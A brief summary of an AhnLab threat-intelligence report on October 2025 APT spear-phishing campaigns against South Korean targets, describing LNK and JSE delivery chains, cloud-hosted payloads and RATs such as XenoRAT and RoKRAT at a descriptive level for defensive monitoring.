AhnLab’s October 2025 South Korea APT trend report shows spear phishing as the dominant observed intrusion type, with increased use of JSE files and multiple LNK-based delivery chains. The DPRK-relevant examples include lures about North Korean nuclear policy, inter-Korean civil exchange organizations, North Korean human rights group donations, and regional political or security themes. One LNK chain executes malicious PowerShell that uses Dropbox API or Google Drive to download payloads, creates scripts and obfuscated RAT malware under locations such as Public, and ultimately runs RATs including XenoRAT and RoKRAT with capabilities such as keylogging and screen capture. Another LNK type downloads AutoIt components, copies curl.exe under another filename, and registers tasks for persistence while enabling command execution, directory listing, upload, and download functions. The report provides practical filenames, lure themes, malware families, and delivery behavior for monitoring APT activity against South Korean targets.